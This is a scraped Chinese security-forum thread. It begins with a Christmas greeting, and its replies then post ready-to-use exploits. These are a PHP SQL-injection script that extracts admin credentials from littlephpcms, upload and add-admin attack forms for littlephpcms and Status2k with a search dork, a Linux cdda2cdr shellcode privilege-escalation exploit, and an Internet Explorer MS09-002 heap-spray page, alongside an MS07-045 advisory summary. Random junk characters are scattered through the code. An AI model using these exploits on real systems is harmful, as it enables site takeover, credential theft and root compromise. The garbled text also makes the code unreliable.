最近看过此主题的会员

返回列表 发帖

非安全中国网祝全体会员朋友们圣诞愉快!

非安全中国网祝所有关注和一直支持我们的朋友圣诞愉快,感谢大家长期以来对我们的支持和帮助,我们的进步离不开你们鼓励,欢迎提出建议与意见!
. }1 N! ]5 Q) s1 a& y5 A, F, G. J. x. o1 P# n3 ~

附件: 您需要登录才可以下载或查看附件。没有帐号?进入圈子

 

您可能还想看的主题:

非安全中国网10周年T恤申请及相关事宜补充说明

非安全中国网10周年T恤申请及相关事宜通告

庆祝非安全中国网创办10周年纪念活动 t恤设计进度

好基友的一次完美信息追踪!

我的一份作业,基于BT平台的利用。初级教程。以前那个连接失效了。从新发下。

dz x3后台拿shell+webshell隐藏

基于各种原因,非安全中国网正进行秘密计划敬请期待

非安全5周年纪念 团队T恤出炉

是否支持非安全中国网5周年定制纪念T恤?

恭祝非安全中国网全体朋友龙年大吉!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

沙发啦,求表扬
1

评分人数

TOP

回复 2# 米的暗部 2 H( [- b. ^% w

1 l0 K  L& m$ |; i
& [1 a( f& J% E, g: C/ Z' ?    表扬米米

TOP

呵呵,元旦快乐
http://chenming5869.blog.163.com/
百分百付出的汗水,百分百走向成功

TOP

大叔好^_^o~!昨天晚上疯了没?/坏笑
讨厌啊,姐才不是圈内人呢~

TOP

littlephpcms 多处注入/上传/敏感信息泄漏问题
###########################################################
* L! W2 r9 A5 E9 w" ]# F! V#  Title: littlephpcms 多处注入,上传,信息泄漏等漏洞

" ~; {2 i- O% ?$ v5 H% m1 m, a
#  Time:2011-09-20

+ M: y) \# t* W& s
#  Team:makebugs
; j' x9 {2 V6 C7 k7 `/ X
#  Author: 黑小子
& Z+ X8 D; N1 `$ z0 R5 ]4 ?; B* c' K7 G###########################################################

" ^% V0 L  D- H" }
// pageArt.php

( I( @: J+ ]% c# K) V3 Y+ L: Y
//..略4 R) r& c, q' W. K+ b. B0 M
$column = $_POST["column"];
. s5 X0 y! {, C4 q) z" }$rownum = $_POST["rownum"];0 p- |( G8 A2 g& _& i' C# Z
$sql = " select id,title,addtime from lpc_article where column_id=".$column;2 K( F4 @4 [# T6 T
//..略% g3 x, c8 I8 c; i2 {- z) q
其他类似文件..略
9 r1 Q! M4 o' }0 o( @( g' d* C
Exp:
6 y8 Q! u4 o) A& X2 _7 [
<?php
$ M; H% d8 M) }4 y5 n, Q0 nerror_reporting(E_ERROR);& H* Q/ ^& ]+ w0 B( a6 d
print_r('
) e6 I( R' d, Y% z3 p- R7 c+———————————————————————+' D& B" u6 b5 f& X; I/ b# _
Sql injection Vul Exploit
7 }& {. \6 c' c: z4 T
Exp :cfking
3 w. t  B8 p3 X! P5 I0 U9 C& `Home: www.webvul.com, [3 U) H2 `& D* U/ A
+———————————————————————+! r4 i, R/ n8 h6 s: a2 i- I* B
');
7 `: ~, u5 B2 z
if ($argc < 2) {
- o/ m7 P3 z' _4 L: H6 Y6 a# |print_r('2 s0 ~5 g7 e, L, {. c7 h
Usage: php '.$argv[0].' host /path
$ ?, U2 D' o8 S! K8 AExample: php '.$argv[0].' www.webvul.com test
% {: P* c8 n, K) T) @');
/ r* V8 s7 O( ~4 D; D) gdie();
  `) c% v, |2 s9 B' ], r- i1 O}
& o# C& c# \/ Kob_start();
0 C$ a- V+ B4 d$host = $argv[1];
2 e1 O- n$ F" e; N$path= $argv[2];
5 I1 e4 O$ n4 O3 A$sock = fsockopen($host, 80, $errno, $errstr, 30);
. w2 l3 S5 }% \) k8 Aif (!$sock) die("$errstr ($errno)3 M6 r8 M( l" |5 m4 u) q, q7 F
");) R2 O- m! s1 Q, o5 Z$ j
fwrite($sock, "GET /article.php?id=255%20and%201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1– HTTP/1.1
) x; A7 f- C0 q");
4 u0 }" ?( o% v: k" k6 M6 Tfwrite($sock, "Host: $host) V0 E! e7 g9 P7 h1 M
");
) P9 v+ a+ e: X. f) Q- nfwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
0 d8 l1 c' ]6 I9 Z' T7 P; B8 e");$ J! r% T4 n) g
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
3 _( k  y  a: E");& k* a2 S$ v: p5 P% g5 u
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5% I: x& I$ v! i: a
");
2 U3 c, o( S7 W/ e. N$ L$ Pfwrite($sock, "Connection: keep-alive
8 e3 j5 ?- _& M5 y# o$ `/ b! t
4 p% Q- f% M5 b");& a0 H0 I, Y6 z. ~8 [; K) q: Z7 |
$headers = "";
) ~) |/ [" t4 G# `while ($str = trim(fgets($sock, 1024)))
4 |, ~% v$ P: D  }; }  Q$headers .= "$str
# f$ `  D, S- o" n+ e8 I+ h7 l  ?";; I  Q- e" [: o0 C
$body = "";: {4 d0 x( e: `  D
while (!feof($sock))& i( X: N; t9 f) a3 W
$body .= fgets($sock, 1024);
9 l( t4 A$ d5 {7 {fclose($sock);
% i: ]/ d+ _5 V2 m+ {( dob_end_flush();7 \% ~: g. n  Z+ E( r
//print_r($body);
+ d' R4 R0 W" j" l0 E5 j& U% Pif (strpos($body, 'cfkings90sec') !== false) {6 t2 z! r$ ]% I$ [, y& l! \" b
preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);3 Y& n! x4 a( F) D& J/ J8 D
$result=explode("-",$arr[1]);
! S5 L* O2 @/ ?- o( w6 x+ v( T# @print_r("Exploit Success!
7 w5 r7 _+ v$ e/ T1 g+ a8 Eusername:".$result[0]."
, X( F- {  p9 l% K9 spassword:".$result[1].": `- ?, w! q! J  j
");

% k# x6 k* w( b) h: w. R# N
}% H( B' ?/ n6 ^8 d" x, {# p8 c+ n% O
else{/ w0 {: F) P4 a% t5 A
print_r("Exploit Failed!
3 W1 l. d+ w6 j# t  o% L");/ @6 Y- `+ H5 B) L* c" B
}7 s: Z( o& |- T# B5 h
?>

1 H, [+ T5 g) e  u
文件上传:
7 R7 o5 I" S% G0 X漏洞文件 :admin/column/upload.php
) G# d& U) u4 n8 h, M:admin/article/upload.php* O# l! S2 u/ J/ O6 ]/ T
Code:
3 o) b9 {0 \( K
$upload_dir = '../../uploads/';& H! h- X# e% Q. v+ f: S" B, B
$file_path = $upload_dir . $_FILES['myfile']['name'];& ~0 ?3 S1 w0 a5 C4 p/ Z& ]
$MAX_SIZE = 20000000;( x1 F! n0 e0 ?* U
echo $_POST['buttoninfo'];
. I4 p1 [7 w4 p3 B……

. D5 M9 }' `& B
if($_FILES['myfile']['size']>$MAX_SIZE)
: W) \2 M/ N; X) lecho "上传的文件大小超过了规定大小";

3 S" u  C5 R- d* r6 j& \3 G
if($_FILES['myfile']['size'] == 0)
7 m/ A- B0 [% l7 I$ Recho "请选择上传的文件";
) }2 n, w: R+ y7 q( e7 a1 W4 R! N
if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path))
, V; ?2 `6 x8 t3 \echo "复制文件失败,请重新上传";

) Z& X" p% S/ V* n8 y( D8 w! `
两个文件都没任何限制!

! v; `% Y6 b$ u, f/ R/ x, [9 M
Exp:

6 x* I1 B2 Z( @; E
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
9 P9 K. }7 `; M5 h<form  enctype="multipart/form-data" action="http://www.sitedirsec.com/admin/column/upload.php" method="post">
$ S1 _5 D. }% @( L, s<p>上传后网站跟目录/uploads/你上传的文件名<p><br>& O6 m( A- j: x, E/ I  y
<input type="file" name="myfile" size="20">5 i2 X" l3 \9 h3 w
<input type="submit" value="Upload">1 z' e+ W8 I0 E$ k" F+ [! v' p- C
</form>

: l; O0 F9 x* w! @
) W8 v- c+ S5 y* H4 W1 d, o- x1 P4 }

2 |' z( j  m* ?. O' F6 }2 R  J3 W  S; b  g" K

# u0 d* U, F8 B7 O- J* U! Z% n  q( ?' p0 x) u) M4 m
; C- s# n& e- l4 T

* d/ c+ M3 L7 q1 v: r1 z
- B8 R; ?; R. y/ ~( _0 I! H; ]3 ^; R) v! j7 r8 F
- a8 h& g& s$ ?8 O* a
1 d6 d* x; w7 r9 E" L
. C) g) E" g6 m3 {0 i  A8 ?9 y

7 `. q! w' ~& S: h! ^7 n1 R3 u3 m( n

) ]) I5 M5 X7 K5 W! n0 w8 e  J% b, F, k6 \. n
0 I1 p$ Q! `* p3 ]* R! m4 p
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS07-045: Internet Explorer 的累积性安全更新
发布日期: 八月 14, 2007

3 h; R- Z1 A0 x3 S
版本: 1.0

! U! w; Y, U1 z
摘要:
; M1 ^6 B, n; b; S: r' l) a
此严重安全更新可消除三个秘密报告的漏洞。 如果用户使用 Internet Explorer 查看特制网页,这些漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。
6 J4 S- S! ~/ g1 i& ]$ ]+ j" s
对于受支持版本 Internet Explorer 5.01 和 Internet Explorer 6 Service Pack 1,此安全更新等级为“严重”。对于受支持版本 Windows XP Home 和 Windows XP Professional 的 Internet Explorer 6,此安全更新等级同样为“严重”,对于其他受支持的操作系统则为“中等”。 对于受支持版本 Windows XP 和 Windows XP Professional 的 Internet Explorer 7 以及 Windows Vista 中的 Internet Explorer 7,此安全更新等级为“重要”,对于其他则为“低”。
, h+ }2 I! K$ }4 a
此安全更新可通过为 ActiveX 控件设置 kill bit 消除两个漏洞,并通过修改 Internet Explorer 处理 CSS 文件中某些字符串的方式消除另一个漏洞。
. D2 L: n( |7 x. r4 t0 m6 W
建议。 Microsoft 建议用户立即应用此更新。
' u; q0 `( \3 j5 R) C# C- \
受影响的软件
& ~" H& T" k# N3 j% ?( R3 {0 G
操作系统 组件 最大安全影响 综合严重程度等级 此更新替代的公告  Internet Explorer 5.01 和 Internet Explorer 6 Service Pack 1         Microsoft Windows 2000 Service Pack 4 Microsoft Internet Explorer 5.01 Service Pack 4 远程执行代码 严重 MS07-033 Microsoft Windows 2000 Service Pack 4 Microsoft Internet Explorer 6 Service Pack 1 远程执行代码 严重 MS07-033 Internet Explorer 6         Windows XP Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 严重 MS07-033 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 严重 MS07-033 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 中等 MS07-033 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Microsoft Internet Explorer 6 远程执行代码 中等 MS07-033 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Microsoft Internet Explorer 6 远程执行代码 中等 MS07-033 Internet Explorer 7         Windows XP Service Pack 2 Windows Internet Explorer 7 远程执行代码 重要 MS07-033 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 Windows Internet Explorer 7 远程执行代码 重要 MS07-033 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 Windows Internet Explorer 7 远程执行代码 低 MS07-033 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 Windows Internet Explorer 7 远程执行代码 低 MS07-033 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) Windows Internet Explorer 7 远程执行代码 低 MS07-033 Windows Vista Windows Internet Explorer 7 远程执行代码 重要 MS07-033 Windows Vista x64 Edition Windows Internet Explorer 7 远程执行代码 重要 MS07-033

5 M. w4 }9 C' H3 w. c
微软的安全公告:
: y3 k9 M$ Y9 W
http://www.microsoft.com/china/technet/security/bulletin/MS07-045.mspx

! \! h: c$ c9 r2 C$ S6 M2 v' P
(以上链接均连到第三方网站)

% T$ M" Z' Y+ Q7 P6 m, L* ?4 R% ~, P* u+ X2 F# c

* p& o+ D' y- f; T% [4 z$ D1 Z, ~7 M6 {% }2 C7 Q
( M% \( i" Y5 ~* |+ U" B

* X" e! P' L% d8 O- l0 k0 S4 d! G) M6 a  o
0 }! u3 v3 h- u: J: y: A' F

0 W/ _. Z3 I4 U% X' @3 O( s
) S5 _7 x; v5 y' G0 M: M; O- H7 y9 D& a# E! d! d
' {  t9 U6 `: x9 |7 U4 d1 P1 k' t
3 j9 c) w. y* _. Q0 N: ~& ~7 l+ h8 t& F

& s1 Z8 v8 \. G1 E
7 N$ w8 l' `" b6 k( M$ t% [
7 p& Z- g! U. J! z% z4 P1 z
9 P' r( b  l# j- P& g: C6 V/ G7 i
; m  G) S- [* i$ L* r" ]. v$ i  }8 L+ I: w
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Status2k添加管理员漏洞
Status2k添加管理员漏洞
0 W1 \7 n) c6 G  bExploit Title : status2k Remote Add Admin Exploit+ _. F( r, L( x
Author: alnjm33
9 N  Y/ n0 D. h. V) SSoftware Link: it cost 24.95 / y* `6 K& p  D$ n; _0 p# g
Script Site :http://www.status2k.com/buynow.html
. o8 U/ P9 g( |6 z4 {$ EVersion: 1+ I+ A% J% K3 _3 D. d/ S
Tested on: Version 1
, V8 S  e; x/ w1 U' M+ aMy home : Sec-war.com
6 b0 w$ r/ W' S. q4 Q::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::1 Q, h! c5 Q2 e6 H0 d$ C+ |
==========================================Dork==========================================/ {* `  a/ y9 ~$ N; j$ I( ^
( allinurl:dynamicimg.php ): Y, C6 Q! @. F  i7 S8 J0 y3 w. Y
================================Exploit=============================================" I+ S5 N% w6 _" A
# y) _$ R& e* \; v! u$ Y; w
<html>
; x' k  B1 u1 ]4 J6 i8 A<title>status2k Remote Add Admin</title>
) H1 K' I, p9 |" T
0 u/ U1 d/ n1 h5 T- a9 v, u; J  D' f<body link="#00FF00" text="#008000" bgcolor="#000000">6 o! X5 a, g) g1 F
" U; q, d- T9 W" f
<form method="POST" action="http://server/Status2k/admin/options/users.php">
8 R3 v0 ]$ D  t& m3 H8 W! k' G<input type="hidden" name="type" value="add">! a2 D; U' |& L$ G* Z
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">, Y. a1 l9 m9 @7 V2 d
<tr>
( ?1 X, r2 H" d" V<td class="top">
' G) `3 v; {4 x* e<p align="center"><b>User &amp; Pass : sec-war</b></p>
- G$ X3 e1 B7 U' A4 j5 [<p align="center"><b><font face="Comic Sans MS">
  d" C2 X9 D! C6 Z- _$ W- a8 n7 Y7 G1 K<a href="http://server/path//index.php?act=idx" style="text-decoration: none">8 L# ^: k8 f) s* u3 b( p
<font color="#00FF00">Security War</font></a></font></b></p>1 M8 O; ^+ M* d" ~
<p align="center"><b>Username:</b></td>% o' H% J, d  J% S
</tr>
+ V$ ~7 E! v8 @+ f9 N! w9 p<tr>/ {6 G8 ]% l4 N/ x( g/ @
<td height="1">
9 J3 _" O# R) o/ I# Q0 \+ \8 Y<p align="center"><input type="text" name="adminuser" size="30" value="sec-war"></td>
$ N7 a, Q: Y: I! t2 ^8 F</tr>
& \$ a# S7 b! @9 r) {) f<tr>
; H( u3 E6 n* o: b& i3 e" p4 D<td class="top">
% W. Q% Q! w1 W, _1 ?1 [' q<p align="center"><b>Password:</b></td>4 h: s+ ~5 `9 u$ B2 V6 K" D
</tr>
5 e( s, P- M- P  [. `<tr>: i1 X1 k: V) F3 ]/ v
7 i/ p! W+ ?' @- D. R
<td height="22">+ O, E: i: L) _$ X* |
<p align="center">
, a  L3 Y) Q7 L) J( [<input type="password" name="adminpass" size="30" value="sec-war"></td>& g* U+ a! T/ _& R5 j" X  l' q* r
</tr>% m! g* x: H" O3 j
<tr>
) V7 W4 E' i% R3 r<td align="right">
5 l) M6 Y( n( C$ _, {( F, L<p align="center">! ]% r! J2 e5 T7 A8 I5 K) ~% ~6 H
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
3 `" T8 X# [) N1 e</tr>
5 A3 l5 |! F+ T% Z</form>6 ~9 }7 o  k9 |. r
</table>
9 L7 B. q2 S$ ~- _</

6 `# o) l( C/ V! f5 Z. ]) `
8 d6 x( X0 n% T# Z" X+ V, J& Q$ T; R8 h* d/ M) F9 k

0 J: d6 F6 ?* B1 O: s8 y7 O3 H& q8 a. C. y. C

4 L# I- R& U' y8 g& `
$ W9 K) l. }, c" @8 _6 ?$ `$ a0 L, _5 V  k2 h. ]8 [* S8 c
4 d+ @* b2 a, Z# t- Z  @

# W+ l8 v% b' `" P* Z0 \
) G$ H* r. C0 s# s4 _( e* x+ `
5 \: [% c# Q- a+ G- p
5 ^6 u* }" j% F
) l2 f$ @; S9 u& u) S$ e" q
  V& g8 b% _1 C% V. d  N" Q" J+ |9 J  j) E) ^

5 Q; P0 h/ I3 X& m" c8 n0 N5 j( j8 I5 h% E! D( Y4 K
2 A( D( c% i, f3 {
: a9 V3 H+ ?: v, S$ W; [  e
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Linux x86 cdda2cdr local disk exploit
cat > /tmp/cdda2x.c <<EOF
7 V% K( ^6 J! o1 M7 E
/*** c3 S) c9 R+ T$ k3 u
** Linux x86 cdda2cdr local disk exploit9 _' v6 g. [; K4 j0 z
** gcc -o inj3ct0r inj3ct0r.c inj3ct0r <offset> <bufsiz>- v2 @, b% Z( x1 z( m
**/
+ R9 L( H6 ~& p3 M& X! {
8 v" J: D+ j6 e' @/ F9 ]3 y
#include <stdlib.h>
2 _; }  F7 j9 l* _#include <stdio.h>
  O7 G" e) Y1 V) V$ z) X
char exec[]= /* Generic Linux x86 running our /tmp program */
) Q" a, q% Z. E2 {/ c  "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"' @8 X2 w( _) W
  "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"5 i  U, X1 L" I) I
  "x80xe8xdcxffxffxff/tmp/cd";
% r2 W# F7 F+ W; Z

8 p4 {9 H3 C2 ?& v  I6 o
#define LEN 500) {2 c! k# s* {1 C5 w3 `
#define NOP 0x90

3 I) M8 q( N: P& |% q: s
unsigned long get_sp(void) {
7 `7 w" r3 m7 Q( i
__asm__("movl %esp, %eax");

; d8 H" {, ^2 Q8 ~6 A9 y3 h
}
- U+ b( |! Q! P
  W/ O9 Q7 r% A" ?void main(int argc, char *argv[]) {
& j+ b" c( i# O& q( J7 \; t
int offset=0;
- X7 o  R+ q6 |int i;
2 B/ m3 u$ r* ]: Kint buflen = LEN;
+ b  ?( ]8 a0 b3 U. olong int addr;) l  {( s1 \/ `
char buf[LEN];
' Y8 L$ X. x6 g  U, Q( _! o2 H
if(argc > 3) {
* U8 F/ D9 L. y: w: N# i  fprintf(stderr, "Error: Usage: %s offset buffer
  `9 ]: |- t3 B+ |. u4 O0 A", argv[0]);- |7 m! `. \1 v
exit(0);
) N) F  v% O  f }' C) A' c1 a' s9 u8 a: B" }
else if (argc == 2){3 q/ a2 Z  }  R$ E( J) u9 I9 |7 O3 E
   offset=atoi(argv[1]);
% `3 {7 [2 g! {( ?6 G' l. \
}+ M0 L: A' E' l9 j
else if (argc == 3) {, X2 E1 `6 o5 w0 u
   offset=atoi(argv[1]);
7 V7 ?9 P) U9 w; q: V  o   buflen=atoi(argv[2]);
* ^) g3 q4 \0 e( [, v0 L
}- J6 r  O( ?- E) n; t
else {0 H  ~1 D' q6 N& F: O8 W: N& b3 ^
   offset=500;% J7 E9 d# Q( P9 l$ e3 `( g
   buflen=500;

# j5 P4 ^4 K* ?- m4 B; r
}

& Q+ ~8 j! b. ]) d$ ^) [
/ V4 I8 o3 {  \) {7 i
addr=get_sp();
' q" Z0 K( H$ U, j. V2 h! h
fprintf(stderr, "Linux x86 cdda2cdr local disk exploit7 k1 t1 @3 k- d, Y( H0 r
");
) d- x/ P5 p/ b4 O) \, o6 \fprintf(stderr, "Using addr: 0x%x
8 A; g* g1 n9 a& f( c", addr+offset);

1 @/ Y, w9 r8 X- r. E8 d% Z
memset(buf,NOP,buflen);! i( p1 s3 X  o) D
memcpy(buf+(buflen/2),exec,strlen(exec));4 T; b: y$ O; A" N6 P1 ~, d
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)% ^7 z8 T- D& w- e
*(int *)&amp;buf=addr+offset;

) d. ~: b: ~; z% q$ G; ~8 v" O
execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);

) N4 [$ `2 i9 J# k- a/ J
; C* {% J. u+ T; W( S; U. d/** `* f+ Z. [- z) \8 E6 |8 @- M
for (i=0; i < strlen(buf); i++) putchar(buf);5 {" P! o4 F* @
*/

" V1 V$ x& f6 f0 ]$ e/ B+ S3 I5 E; v
}

" o  D5 v; G6 k! z
EOF
7 ]. v4 Z4 d& S1 {
cat > /tmp/cd.c <<EOF
# X# o6 P8 z2 U) [( dvoid main() {
" T1 b! C6 {- Y  ~- V# ^: b    setregid(getegid(), getegid());: b/ ^4 E$ n6 m; N, z
    system("/bin/bash");
. @5 c  J& M) ]0 o0 s0 G4 T+ J}: F" I- v% K7 `8 q/ m* H+ T# N9 i
EOF

8 E" j1 o& z  V1 }
gcc -o /tmp/cd /tmp/cd.c! G7 R$ |, x# i9 \4 m
gcc -o /tmp/cdda2x /tmp/cdda2x.c
% I- b& C! x+ i1 n+ }9 yecho "Note that gid=6 leads to easy root access.."# z: T) w) }  C" T* C& z1 d
/tmp/cdda2x

, E( ]5 }- i3 Q" m0 {* _) W6 w) x: o& {8 \" h+ x7 S

7 A, L- ]5 ~3 I2 }% o
- {: O* {( H$ Z! z2 m1 x3 v7 Q4 _1 D# B' x  Z
3 C6 o# U. v& j6 h- H9 a/ W0 e
) M; r5 J# A# D: v; z
& h$ W2 Y! @0 `" C8 O$ t" h

. z3 i: h. ~* a
. H8 s7 D. f$ O3 p7 D
; ?8 S0 w& Z: S
% U& w. O- Y! X1 ^2 d$ G" e
: p7 }1 A) ~( y- t, P* W* E- l6 o% e# X
' x6 q: F+ @' m1 Z

+ i0 o4 @- y' B% s6 \. \/ }0 A0 n* X1 M6 d9 G8 Q
( A, o  m1 m# _+ u* Z' ]

. D$ c/ |6 ^+ `- T* `/ A$ f公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MS09-002-0day漏洞及利用工具!
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>
( C& C/ t# G9 F3 R: S9 `( s, C; w! T3 N

0 G- h1 }! d$ V" _  t4 ?7 l/ h3 @# Y$ O( `  d- k" Q$ P% }
MS09-002 0day  MS09-002-0day漏洞及利用工具( P2 k. r+ m) x% \* Z8 G6 X5 t
, t. d) g- @9 j- @
2 d2 ]7 ^- l/ z9 `
<script language="JavaScript"> var c="putyourshizhere-unescaped"; var array = new Array(); var ls = 0x100000-(c.length*2+0x01020); var b = unescape("%u0C0C%u0C0C"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) {         array = lh + c; } CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<1000;x++) a1.push(document.createElement("img")); function ok() {         o1=document.createElement("tbody");         o1.click;         var o2 = o1.cloneNode();         o1.clearAttributes();         o1=null; CollectGarbage();         for(var x=0;x<a1.length;x++) a1[x].src=s1;         o2.click; } </script><script>window.setTimeout("ok();",800);</script> </TABLE>8 G* K: I! B+ f. x4 ]. G$ N
* v4 t6 U) C2 N: S- W3 q

5 N$ |  @/ p) p: Y& Q
6 ?- o/ h' y. x) }' }: \8 Z: r& L2 y0 T: |
1 w! g$ w0 Z7 x# S: U0 A* F& }

3 `6 }! K2 t' K& T( J% B! h* g5 h/ ~. s. t( w/ T

5 H- e- D  \. r% u' V2 k0 P" U
9 w7 ?1 J# a# q) E) X6 G' \. Y
% o( C4 h/ q* n3 q& H3 s
$ h2 o# m* G9 z/ k% j7 X
6 H9 q" |% H4 P5 a0 d! H- V) r
! I0 U% ^! D' a; P2 x/ x7 \5 i# f4 g: V- t/ a

' n$ F8 ?4 d, J1 w1 j0 Y- W- h, U+ b* q' V

5 F9 b- K" T5 T. c# m* _8 J; ]  Y5 ]
; z3 B' K6 r3 T6 u6 f2 P公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表